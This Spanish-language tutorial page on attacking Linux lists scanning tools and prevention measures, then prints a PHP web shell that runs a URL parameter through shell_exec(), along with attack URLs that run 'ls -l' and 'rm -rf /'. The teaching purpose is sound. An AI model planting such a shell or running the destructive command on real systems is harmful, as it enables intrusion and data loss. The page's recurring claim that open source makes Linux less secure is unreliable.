Hackear el sistema operativo Linux: Más tutorial de ejemplo sobre Ubuntu

Hackear el sistema operativo Linux: tutorial completo con ejemplo sobre Ubuntu

Linux es el sistema operativo de servidor más utilizado, especialmente para servidores web. Es de código abierto lo que significa que cualquiera puede tener acceso a su código fuente.

Esto lo hace menos seguro en comparación con otros sistemas operativos, ya que los atacantes pueden estudiar el código fuente para encontrar vulnerabilidades.

Contenido pendiente de una última revisión.
Es posible que este tutorial no funcione en las últimas versiones de Ubuntu.

Introducción breve a Linux

Linux es un sistema operativo de código abierto. Existen muchas distribuciones de sistemas operativos basados en Linux como Redhat, Fedora y Ubuntu, etc. Si eres un principiante, quizás puedes probar con las mejores distros par principiantes en Unix.

A diferencia de otros sistemas operativos, Linux es menos seguro cuando se trata de seguridad. Esto se debe a que el código fuente está disponible libremente, por lo que es fácil estudiarlo en busca de vulnerabilidades y explotarlas en comparación con otros sistemas operativos que no son de código abierto.

Linux se puede utilizar como servidor, escritorio, tableta o sistema operativo de dispositivo móvil.

Los programas de Linux se pueden operar usando GUI o comandos. Los comandos de Linux para la piratería de Kali Linux son más efectivos y eficientes en comparación con el uso de la GUI. Por esta razón, ayuda conocer los comandos básicos de Linux para piratear.

Herramientas de piratería de Linux

  • Nessus: : esta herramienta se puede usar para hackear Ubuntu, escanear configuraciones, parches y redes, etc. se puede encontrar en https://www.tenable.com/products/nessus
  • NMap: Esta herramienta se puede utilizar para supervisar los hosts que se ejecutan en el servidor y los servicios que están utilizando. También se puede utilizar para buscar puertos. Se puede encontrar en https://nmap.org/
  • SARA: SARA es el acrónimo de Security Auditor’s Research Assistant. Como su nombre lo indica, esta herramienta se puede utilizar para auditar redes contra amenazas como SQL
  • injection, XSS, etc. se puede encontrar en http://www-arc.com/sara/sara.html

La lista anterior no es exhaustiva, solo da una idea de las herramientas disponibles para la piratería de Ubuntu y la piratería de sistemas Linux.

Cómo prevenir los hacks de Linux

Linux Hacking se aprovecha de las vulnerabilidades en el sistema operativo, una organización puede adoptar la siguiente política para protegerse contra tales ataques.

  • Administración de parches: los parches corrigen errores que los atacantes explotan para comprometer un sistema. Una buena política de administración de parches asegurará que aplique constantemente parches relevantes a su sistema.
  • Configuración adecuada del sistema operativo: otros exploits se aprovechan de las debilidades en la configuración del servidor. Los nombres de usuario y demonios inactivos deben deshabilitarse. Se debe cambiar la configuración predeterminada, como las contraseñas comunes de la aplicación, los nombres de usuario predeterminados y algunos números de puerto.
  • Sistema de detección de intrusos: estas herramientas se pueden utilizar para detectar el acceso no autorizado al sistema. Algunas herramientas tienen la capacidad de detectar y prevenir tales ataques.

Actividad de piratería: Hackear un sistema Ubuntu Linux usando PHP

En este escenario práctico, aprenderemos cómo hackear con Ubuntu y le proporcionaremos información básica sobre cómo puede usar PHP para comprometer un Linux. No vamos a apuntar a ninguna víctima.

Si deseas probarlo, puede instalar LAMPP en tu máquina local.

PHP viene con dos funciones que se pueden usar para ejecutar comandos de piratería de Linux. Tiene funciones exec() y shell_exec(). La función exec() devuelve la última línea de la salida del comando, mientras que la shell_exec() devuelve todo el resultado del comando como una cadena.

Para fines de demostración, supongamos que los administradores del atacante cargan el siguiente archivo en un servidor web.

<?php
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "executing shell command:-> $cmd</br>";
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
?>

El script anterior obtiene el comando de la variable GET denominada cmd. El comando se ejecuta utilizando shell_exec() y los resultados devueltos en el navegador.

El código anterior se puede explotar utilizando la siguiente URL:

http://localhost/cp/konsole.php?cmd=ls%20-l

  • “… konsole.php?cmd=ls%20-l” asignael valor ls –l a la variable cmd.

El comando en Ubuntu para hackear contra el servidor se ejecutará como:

shell_exec('ls -l') ;

El comando anterior simplemente muestra los archivos en el directorio actual y los permisos. Supongamos que el atacante pasa el siguiente comando.

rm -rf /
  • “rm” elimina los archivos
  • “rf” hace que el comando rm se ejecute en modo recursivo. Eliminación de todas las carpetas y archivos.
  • “/” indica al comando que comience a eliminar archivos del directorio raíz.

La URL del ataque se vería algo como esto:

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Resumen

  • Linux es un sistema operativo popular para servidores, computadoras de escritorio, tabletas y dispositivos móviles.
  • Linux es de código abierto, y el código fuente puede ser obtenido por cualquier persona. Esto hace que sea fácil detectar las vulnerabilidades. Es uno de los mejores sistemas operativos para hackers.
  • Los comandos básicos y de piratería de redes en Ubuntu son valiosos para los piratas informáticos de Linux.
  • Las vulnerabilidades son una debilidad que puede ser explotada para comprometer un sistema.
  • Una buena seguridad puede ayudar a proteger un sistema de ser comprometido por un atacante.

? Libro Hacking desde 0


? Herramientas Hacking ? Recursos Hacking


?‍♀️ Cursos Seguridad en Red ? Cursos RedesCursos Servicios en Nube ?‍♂️ Libros Seguridad y Criptografía

Artículos Relacionados
Fallece el abogado hacktivista Jay Leiderman

Jay Leiderman, un abogado defensor de California conocido por su defensa de los denunciantes y la defensa de los disidentes políticos y los piratas informáticos, ha muerto. Jay de 50 años, fue apodado el "Defensor del Hacktivista" por The Atlantic en 2012. Leiderman se ¡SEGUIR LEYENDO!

6 Mejores Lenguajes de Programación para Criptografía 2023

La criptografía permite la transmisión de información que solo el destinatario puede descifrar mediante el uso de código cifrado. Este tipo de procedimiento bloquea el acceso no autorizado a los datos. Los lenguajes de programaciónson, por tanto, cruciales para poder limitar el acceso no ¡SEGUIR LEYENDO!

¿Quién es Kevin Mitnick? Conociendo al hacker más buscado de la historia

Biografía completa, libros y documentos de Kevin Mitnick. Conoce todo lo que debes saber sobre el conocido como unos de los hackers más relevantes de la historia. Primero veremos unas respuestas rápidas, para posteriormente, dar paso a la larga historia de su vida para ¡SEGUIR LEYENDO!

¿Qué es la ley de Aarón?

La Ley de Aaron está pendiente de legislación y finalmente estancada fue introducida en respuesta a la muerte de Aaron Swartz, un respetado y célebre activista político, programador informático y empresario que fundó Demand Progress y co-fundador de Reddit. Swartz murió el 11 de ¡SEGUIR LEYENDO!

A05: La configuración de seguridad incorrecta (by OWASP)

Visión general Pasando del n.° 6 en la edición anterior, el 90 % de las aplicaciones se probaron en busca de algún tipo de configuración incorrecta, con una tasa de incidencia promedio del 4. % y más de 208 000 ocurrencias de Enumeración de ¡SEGUIR LEYENDO!

SharpNamedPipePTH: Pase el hash a una canalización para la suplantación de token

Este proyecto es una herramienta de C# para usar Pass-the-Hash para la autenticación en una canalización de nombre local para la suplantación de identidad del usuario. Necesitas un administrador local o derechos de SEImpersonate para poder usar esto, puedes seguir la siguiente publicación de ¡SEGUIR LEYENDO!

Cómo evita DMARC el phising

DMARC es un estándar global para la autenticación de correo electrónico que permite a los remitentes verificar que el correo electrónico realmente proviene de quien dice provenir. Esto ayuda a frenar los ataques de spam y phishing que se encuentran entre los delitos cibernéticos ¡SEGUIR LEYENDO!